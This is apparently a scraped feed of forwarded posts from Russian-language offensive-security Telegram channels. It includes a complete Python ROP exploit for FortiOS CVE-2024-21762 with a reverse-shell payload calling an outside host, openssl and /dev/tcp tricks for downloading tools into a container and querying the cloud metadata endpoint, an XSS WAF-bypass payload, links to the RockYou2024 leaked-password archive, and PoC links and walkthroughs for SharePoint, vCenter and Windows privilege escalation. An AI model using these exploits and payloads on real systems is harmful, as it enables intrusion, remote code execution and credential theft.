Forwarded from Очерк
Недавно возникла ситуация, оказался в контейнере, где не было никаких curl, wget и прав что бы что-то поставить самостоятельно.
Добрые люди подсказали юзать openssl:
Так же можно выполнить SSRF если это облако:
Оставлю это здесь если кто-то столкнется с таким🕴
Добрые люди подсказали юзать openssl:
(echo -ne "GET /stealthcopter/deepce/main/deepce.sh HTTP/1.1\r\nHost: raw.githubusercontent.com\r\nConnection: close\r\n\r\n"; sleep 3) | openssl s_client -connect raw.githubusercontent.com:443 -quiet > deepce.sh
Так же можно выполнить SSRF если это облако:
exec 3<>/dev/tcp/169.254.169.254/80 && echo -e "GET /metadata/v1.json HTTP/1.1\r\nHost: 169.254.169.254\r\nConnection: close\r\n\r\n" >&3 && cat <&3 > v1.json
Оставлю это здесь если кто-то столкнется с таким🕴
🥱2🤯1
Forwarded from APT
🔥 VMware vCenter Server RCE + PrivEsc
Multiple heap-overflow vulnerabilities in the implementation of the DCE/RPC protocol. They could allow a bad actor with network access to vCenter Server to achieve remote code execution by sending a specially crafted network packet.
— CVE-2024-37079: A heap-overflow vulnerability in the DCERPC protocol implementation of vCenter Server that allows a malicious actor with network access to send specially crafted packets, potentially leading to remote code execution. (CVSS v3.1 score: 9.8 "critical");
— CVE-2024-37080: Another heap overflow vulnerability in the DCERPC protocol of vCenter Server. Similar to CVE-2024-37079, it allows an attacker with network access to exploit heap overflow by sending crafted packets, potentially resulting in remote code execution. (CVSS v3.1 score: 9.8 "critical");
— CVE-2024-37081: This vulnerability arises from a misconfiguration of sudo in vCenter Server, permitting an authenticated local user to exploit this flaw to elevate their privileges to root on the vCenter Server Appliance. (CVSS v3.1 score: 7.8 "high").
Nuclei Template (PoC):
🔗 https://gist.github.com/tothi/0ff034b254aca527c3a1283ff854592a
Shodan
FOFA
#vmware #vcenter #rce #lpe #cve
Multiple heap-overflow vulnerabilities in the implementation of the DCE/RPC protocol. They could allow a bad actor with network access to vCenter Server to achieve remote code execution by sending a specially crafted network packet.
— CVE-2024-37079: A heap-overflow vulnerability in the DCERPC protocol implementation of vCenter Server that allows a malicious actor with network access to send specially crafted packets, potentially leading to remote code execution. (CVSS v3.1 score: 9.8 "critical");
— CVE-2024-37080: Another heap overflow vulnerability in the DCERPC protocol of vCenter Server. Similar to CVE-2024-37079, it allows an attacker with network access to exploit heap overflow by sending crafted packets, potentially resulting in remote code execution. (CVSS v3.1 score: 9.8 "critical");
— CVE-2024-37081: This vulnerability arises from a misconfiguration of sudo in vCenter Server, permitting an authenticated local user to exploit this flaw to elevate their privileges to root on the vCenter Server Appliance. (CVSS v3.1 score: 7.8 "high").
Nuclei Template (PoC):
🔗 https://gist.github.com/tothi/0ff034b254aca527c3a1283ff854592a
Shodan
product:"VMware vCenter Server"
FOFA
app="vmware-vCenter"
#vmware #vcenter #rce #lpe #cve
🥱3
Forwarded from Похек (Сергей Зыбнев)
Fortinet FortiOS & FortiProxy Unauthorized RCE CVE-2024-21762
#RCE #CVE #Fortinet #FortiOS #FortiProxy
CVE-2024-21762 представляет собой уязвимость записи за границы буфера (buffer overflow) в Fortinet FortiOS и FortiProxy. Эта уязвимость позволяет неавторизованному атакующему выполнять произвольный код с помощью специально сформированных HTTP-запросов.
➡️ Атакуемые продукты:
- FortiOS
- FortiProxy
Эксплойт:
Подробные ресерчи можете найти ТУТ, ТУТ, ТУТ
Скрипт для проверки безопасности вашего сервера
https://github.com/BishopFox/cve-2024-21762-check
🌚 @poxek
#RCE #CVE #Fortinet #FortiOS #FortiProxy
CVE-2024-21762 представляет собой уязвимость записи за границы буфера (buffer overflow) в Fortinet FortiOS и FortiProxy. Эта уязвимость позволяет неавторизованному атакующему выполнять произвольный код с помощью специально сформированных HTTP-запросов.
- FortiOS
- FortiProxy
Эксплойт:
import socket
import time
import argparse
TARGET = 'xxxxxxxxxxxx' # Target IP
PORT = 443 # Target port, usually 443 for SSL VPN
def make_sock(target, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target, port))
return sock
def send_payload(payload, target, port):
with make_sock(target, port) as ssock:
ssock.sendall(payload)
def main():
ssl_do_handshake_ptr = b"%60%ce%42%00%00%00%00%00"
getcwd_ptr = b"%70%62%2c%04%00%00%00%00"
pivot_1 = b"%52%f7%fd%00%00%00%00%00" # push rdi; pop rsp; ret;
pivot_2 = b"%ac%c9%ab%02%00%00%00%00" # add rsp, 0x2a0; pop rbx; pop r12; pop rbp; ret;
rop = b""
rop += b"%c6%e2%46%00%00%00%00%00" # push rdi; pop rax; ret;
rop += b"%19%6f%4d%01%00%00%00%00" # sub rax, 0x2c8; ret;
rop += b"%8e%b2%fe%01%00%00%00%00" # add rax, 0x10; ret;
rop += b"%63%db%ae%02%00%00%00%00" # pop rcx; ret;
rop += b"%00%00%00%00%00%00%00%00" # zero rcx
rop += b"%38%ad%98%02%00%00%00%00" # or rcx, rax; setne al; movzx eax, al; ret;
rop += b"%c6%52%86%02%00%00%00%00" # shl rax, 4; add rax, rdx; ret;
rop += b"%6e%d0%3f%01%00%00%00%00" # or rdx, rcx; ret; - rdx is zero so this is a copy
rop += b"%a4%df%98%02%00%00%00%00" # sub rdx, rax; mov rax, rdx; ret;
rop += b"%f5%2c%e6%00%00%00%00%00" # sub rax, 0x10; ret;
rop += b"%e4%e6%d7%01%00%00%00%00" # add rsi, rax; mov [rdi+8], rsi; ret;
rop += b"%10%1b%0a%01%00%00%00%00" # push rax; pop rdi; add eax, 0x5d5c415b; ret;
rop += b"%25%0f%8d%02%00%00%00%00" # pop r8; ret; 0x028d0f25
rop += b"%00%00%00%00%00%00%00%00" # r8
pivot_3 = b"%e0%3f%4d%02%00%00%00%00" # add rsp, 0xd90; pop rbx; pop r12; pop rbp; ret;
call_execl = b"%80%c1%43%00%00%00%00%00"
bin_node = b"/bin/node%00"
e_flag = b"-e%00"
## use this one for rev shell b'(function(){var net%3drequire("net"),cp%3drequire("child_process"),sh%3dcp.spawn("/bin/node",["-i"]);var client%3dnew net.Socket();client.connect(1337,"xxxxxxxxxxx",function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});return /a/;})();%00'
js_payload = b'(function(){var cp=require("child_process");cp.execSync("nslookup xxxxxxxxxxx.oastify.com");})();%00'
form_value = b""
form_value += b"B"*11 + bin_node + b"B"*6 + e_flag + b"B"*14 + js_payload
form_value += b"B"*438 + pivot_2 + getcwd_ptr
form_value += b"B"*32 + pivot_1
form_value += b"B"*168 + call_execl
form_value += b"B"*432 + ssl_do_handshake_ptr
form_value += b"B"*32 + rop + pivot_3
body = (b"B"*1808 + b"=" + form_value + b"&")*20
data = b"POST /remote/hostcheck_validate HTTP/1.1\r\n"
data += b"Host: " + TARGET.encode() + b"\r\n"
data += b"Content-Length: " + str(len(body)).encode() + b"\r\n"
data += b"\r\n"
data += body
send_payload(data, TARGET, PORT)
# Short delay to ensure the server processes the first request
time.sleep(2)
# Preparing and sending the second part of the exploit
data = b"POST / HTTP/1.1\r\n"
data += b"Host: " + TARGET.encode() + b"\r\n"
data += b"Transfer-Encoding: chunked\r\n"
data += b"\r\n"
data += b"0"*4137 + b"\0"
data += b"A"*1 + b"\r\n\r\n"
send_payload(data, TARGET, PORT)
if __name__ == "__main__":
main()
Подробные ресерчи можете найти ТУТ, ТУТ, ТУТ
Скрипт для проверки безопасности вашего сервера
https://github.com/BishopFox/cve-2024-21762-check
git clone https://github.com/BishopFox/cve-2024-21762-check; cd cve-2024-21762-check; python3 check-cve-2024-21762.py <host> <port>
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Похек (Сергей Зыбнев)
RockYou2024
Архив весит 45 гб
Распакованный 156 гб
Загрузил на свой S3. Скорость не лучшая, но точно не отвалиться загрузка
https://s3.timeweb.cloud/fd51ce25-6f95e3f8-263a-4b13-92af-12bc265adb44/rockyou2024.zip
Яндекс Диск. Тут скорость заметно быстрее
https://disk.yandex.ru/d/1spMBmxcEnN95g
🌚 @poxek
Архив весит 45 гб
Распакованный 156 гб
Загрузил на свой S3. Скорость не лучшая, но точно не отвалиться загрузка
https://s3.timeweb.cloud/fd51ce25-6f95e3f8-263a-4b13-92af-12bc265adb44/rockyou2024.zip
Яндекс Диск. Тут скорость заметно быстрее
https://disk.yandex.ru/d/1spMBmxcEnN95g
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from SecuriXy.kz
Для быстрого поиска альясом субиков домена через crt.sh добавляйте альяс в ~/.zshrc
Потом обновите сорсы
Ну и используйте
crtsh() {
if [ -z "$1" ]; then
echo "Usage: crtsh <domain>"
return 1
fi
curl -s "https://crt.sh/?q=$1&output=json" --compressed -H 'User-Agent: Mozilla/5.0' | jq -r '.[].common_name,.[].name_value' | sort -u
}
Потом обновите сорсы
source ~/.zshrcНу и используйте
crtsh DOMAIN.COM
Forwarded from APT
This media is not supported in your browser
VIEW IN TELEGRAM
PoC for:
— CVE-2024-38094
— CVE-2024-38024
— CVE-2024-38023
🔗 Source:
https://github.com/testanull/MS-SharePoint-July-Patch-RCE-PoC
#sharepoint #poc #rce #cve
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1🔥1
Forwarded from AP Security
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - aydinnyunus/ai-captcha-bypass: AI Captcha Bypass
AI Captcha Bypass. Contribute to aydinnyunus/ai-captcha-bypass development by creating an account on GitHub.
👍1
Forwarded from SecuriXy.kz
#CVE-2024-22274: Privilege Escalation: #VMware #vCenter Server Authenticated #RCE
https://github.com/l0n3m4n/CVE-2024-22274-RCE
https://github.com/l0n3m4n/CVE-2024-22274-RCE
🥱1
Forwarded from Codeby
🗣️ Эта уязвимость позволяет злоумышленнику запускать pipeline jobs от имени другого пользователя, получая доступ к внутренним репозиториям и закрытым проектам.
# For GitLab CE
sudo apt-get update
sudo apt-get install gitlab-ce=17.1.2-ce.0
# For GitLab EE
sudo apt-get update
sudo apt-get install gitlab-ee=17.1.2-ee.0
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Ralf Hacker Channel (Ralf Hacker)
This media is not supported in your browser
VIEW IN TELEGRAM
Еще одна картошка)) Абузит RPCSS в DCOM при обработке OXID
https://github.com/lypd0/DeadPotato
#lpe #potato #ad #pentest #redteam
https://github.com/lypd0/DeadPotato
#lpe #potato #ad #pentest #redteam
🥱1
Forwarded from Похек (Сергей Зыбнев)
Headerpwn 🤯
#security_headers
Представьте, что вы нашли пару критов на проекте, многое хаёв и т.д. Обычный рабочий день в Awillix 🌚
Под конец проекта мы собираем мелкие баги и делаем 100% покрытие скоупа различными ручными и автотестами. Но протыкивать различные заголовки для поиска мисконфигов всегда не очень хочется.
В таком случае я пользуюсь headerpwn. По сути я её нашел когда хотел написать аналогичное на python, но в выдаче google нашел эту репу, что по сути и решило мою проблему.
Установка простейшая:
Использование ни чуть не сложнее:
Формат заголовков в файле
Автор репозитория поделился своим списком заголовков, забрать ТУТ.
Также можете использовать прокси, к примеру для проксирования запросов в BurpSuite или при пивотинге
🧩 Github
🌚 @poxek | 📹 YouTube
#security_headers
Представьте, что вы нашли пару критов на проекте, многое хаёв и т.д. Обычный рабочий день в Awillix 🌚
Под конец проекта мы собираем мелкие баги и делаем 100% покрытие скоупа различными ручными и автотестами. Но протыкивать различные заголовки для поиска мисконфигов всегда не очень хочется.
В таком случае я пользуюсь headerpwn. По сути я её нашел когда хотел написать аналогичное на python, но в выдаче google нашел эту репу, что по сути и решило мою проблему.
Установка простейшая:
go install github.com/devanshbatham/headerpwn@v0.0.3
Использование ни чуть не сложнее:
headerpwn -url https://example.com -headers headers.txt
Формат заголовков в файле
headers.txtProxy-Authenticate: foobar
Proxy-Authentication-Required: foobar
Proxy-Authorization: foobar
Proxy-Connection: foobar
Proxy-Host: foobar
Proxy-Http: foobar
Автор репозитория поделился своим списком заголовков, забрать ТУТ.
Также можете использовать прокси, к примеру для проксирования запросов в BurpSuite или при пивотинге
headerpwn -url https://example.com -headers headers.txt -proxy 127.0.0.1:8080
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2
Forwarded from Pentester
Leaked Wallpaper
This is a privilege escalation tool (fixed with CVE-2024-38100 in KB5040434) that allows us to leak a user's NetNTLM hash from any session on the computer, even if we are working from a low-privileged user.
https://github.com/MzHmO/LeakedWallpaper
This is a privilege escalation tool (fixed with CVE-2024-38100 in KB5040434) that allows us to leak a user's NetNTLM hash from any session on the computer, even if we are working from a low-privileged user.
https://github.com/MzHmO/LeakedWallpaper
GitHub
GitHub - MzHmO/LeakedWallpaper: Leak of any user's NetNTLM hash. Fixed in KB5040434
Leak of any user's NetNTLM hash. Fixed in KB5040434 - MzHmO/LeakedWallpaper
Forwarded from cKure
■■■■■ WAF Fortinet FortiGate XSS Bypass:
<details open ontoggle="(()=>alert
ibrahimxss)()"></details>Source: https://x.com/ibrahimxss_/status/1819772406988231000X (formerly Twitter)
xss0r (@xss0r) on X
WAF Fortinet FortiGate XSS Bypass:
#Payload:
<details open ontoggle="(()=>alert`ibrahimxss`)()"></details>
#xss #xssbypass #xssWAF #wafbypass #fortinet #fortigate #ibrahimxss #IBRAHIMXSS #xsstool #xsspayloads #payload
#Payload:
<details open ontoggle="(()=>alert`ibrahimxss`)()"></details>
#xss #xssbypass #xssWAF #wafbypass #fortinet #fortigate #ibrahimxss #IBRAHIMXSS #xsstool #xsspayloads #payload
Forwarded from SecuriXy.kz
Снова Apache #OFBiz ERP #RCE #CVE-2024-38856
Коренная причина уязвимости кроется в недостатках механизма аутентификации
CVSS score of 9.8 / 10.0.
Она затрагивает Apache OFBiz все версии до 18.12.15.
https://thehackernews.com/2024/08/new-zero-day-flaw-in-apache-ofbiz-erp.html
Big thanks Aman for news
Коренная причина уязвимости кроется в недостатках механизма аутентификации
CVSS score of 9.8 / 10.0.
Она затрагивает Apache OFBiz все версии до 18.12.15.
https://thehackernews.com/2024/08/new-zero-day-flaw-in-apache-ofbiz-erp.html
Big thanks Aman for news
Forwarded from Укротитель змей
RCE через Microsoft SharePoint Server 2019
Microsoft SharePoint — веб-платформа для совместной работы, управления документами и организации совместного доступа к информации в организациях, которая широко используется в корпоративной среде.
Недавно увидел интересные CVE которые затрагивают эту веб-платформу:
CVE-2024-38094
CVE-2024-38024
CVE-2024-38023
Чтобы успешно эксплуатировать RCE, необходимо выполнить несколько условий, а именно
1) Сетевой доступ к уязвимому серверу SharePoint.
2) Учетные данные (лог/пасс) для NTLM аутентификации + учетная запись должна иметь права на создание файлов и папок.
Для успешной эксплуатации уязвимости предоставляется три скрипта: poc_filtered.py, poc_specific.py и poc_sub.py. Сейчас коротко разберем суть и как они работают.
Все три скрипта используют NTLM аутентификацию для доступа к API SharePoint и выполняют схожие действия:
Скрипты сначала аутентифицируются на сервере SharePoint с использованием предоставленных учетных данных. Затем они создают необходимые папки на сервере, такие как BusinessDataMetadataCatalog, отправляя POST-запросы к API SharePoint по пути /api/web/Folders.
Далее создается и загружается файл метаданных BDCMetadata.bdcm, содержащий информацию для выполнения уязвимости. В информации находятся команды для выполнения различных методов SharePoint, таких как GetCreatorView, GetDefaultValues, GetFilters и FindFiltered. Эти методы позволяют взаимодействовать с объектами и данными SharePoint, что в конечном итоге позволяет выполнить произвольный код.
То есть после запуска poc_filtered.py создается новая папка BusinessDataMetadataCatalog, после чего скрипт получает и сохраняет значение X-RequestDigest для дальнейших запросов. X-RequestDigest — это токен, подтверждающий, что запрос исходит от подлинного пользователя. Этот токен включается в заголовки последующих запросов для подтверждения их подлинности. Затем скрипт создает и загружает файл метаданных BDCMetadata.bdcm в созданную папку. Этот файл содержит данные и команды, которые будут использоваться для выполнения уязвимости. В конце, скрипт отправляет специально сформированный XML-запрос к API SharePoint для выполнения уязвимых методов, что позволяет выполнить произвольный код на сервере.
Но между скриптами есть небольшая разница, а именно в используемых методах.
1) poc_filtered.py использует метод FindFiltered для взаимодействия с объектами SharePoint.
2) poc_specific.py использует метод FindSpecific для выполнения конкретных задач и команд.
3) poc_sub.py в этом скрипте используется метод Subscribe для подписки на события или действия.
PoC
PoC Video
Microsoft SharePoint — веб-платформа для совместной работы, управления документами и организации совместного доступа к информации в организациях, которая широко используется в корпоративной среде.
Недавно увидел интересные CVE которые затрагивают эту веб-платформу:
CVE-2024-38094
CVE-2024-38024
CVE-2024-38023
Чтобы успешно эксплуатировать RCE, необходимо выполнить несколько условий, а именно
1) Сетевой доступ к уязвимому серверу SharePoint.
2) Учетные данные (лог/пасс) для NTLM аутентификации + учетная запись должна иметь права на создание файлов и папок.
Для успешной эксплуатации уязвимости предоставляется три скрипта: poc_filtered.py, poc_specific.py и poc_sub.py. Сейчас коротко разберем суть и как они работают.
Все три скрипта используют NTLM аутентификацию для доступа к API SharePoint и выполняют схожие действия:
Скрипты сначала аутентифицируются на сервере SharePoint с использованием предоставленных учетных данных. Затем они создают необходимые папки на сервере, такие как BusinessDataMetadataCatalog, отправляя POST-запросы к API SharePoint по пути /api/web/Folders.
Далее создается и загружается файл метаданных BDCMetadata.bdcm, содержащий информацию для выполнения уязвимости. В информации находятся команды для выполнения различных методов SharePoint, таких как GetCreatorView, GetDefaultValues, GetFilters и FindFiltered. Эти методы позволяют взаимодействовать с объектами и данными SharePoint, что в конечном итоге позволяет выполнить произвольный код.
То есть после запуска poc_filtered.py создается новая папка BusinessDataMetadataCatalog, после чего скрипт получает и сохраняет значение X-RequestDigest для дальнейших запросов. X-RequestDigest — это токен, подтверждающий, что запрос исходит от подлинного пользователя. Этот токен включается в заголовки последующих запросов для подтверждения их подлинности. Затем скрипт создает и загружает файл метаданных BDCMetadata.bdcm в созданную папку. Этот файл содержит данные и команды, которые будут использоваться для выполнения уязвимости. В конце, скрипт отправляет специально сформированный XML-запрос к API SharePoint для выполнения уязвимых методов, что позволяет выполнить произвольный код на сервере.
Но между скриптами есть небольшая разница, а именно в используемых методах.
1) poc_filtered.py использует метод FindFiltered для взаимодействия с объектами SharePoint.
2) poc_specific.py использует метод FindSpecific для выполнения конкретных задач и команд.
3) poc_sub.py в этом скрипте используется метод Subscribe для подписки на события или действия.
PoC
PoC Video
🔥1
Forwarded from Machete Hack
This media is not supported in your browser
VIEW IN TELEGRAM
Недавно на github'е наткнулся на интересную утилиту LazyEgg, позволяющую добывать ссылки, фото, URL'ы, айпишники, креды, ключи по целевому URL, а также искать и анализировать js файлы по сигнатурам
https://github.com/schooldropout1337/lazyegg
git clone https://github.com/schooldropout1337/lazyegg.git
python lazyegg.py http://localhost:8080
python lazyegg.py http://localhost:8080/js --js_scan --w wordlist.txt
cat jsurls.txt | xargs -I{} bash -c 'echo -e "\ntarget : {}\n" && python lazyegg.py "{}" --js_urls --domains --ips --leaked_creds'waybackurls vulnweb.com | grep '\.js$' | awk -F '?' '{print $1}' | sort -u | xargs -I{} bash -c 'python lazyegg.py "{}" --js_urls --domains --ips' > jsurls.log && cat jsurls.log | grep '\.' | sort -ule-jsurl.zip репозиторияPlease open Telegram to view this post
VIEW IN TELEGRAM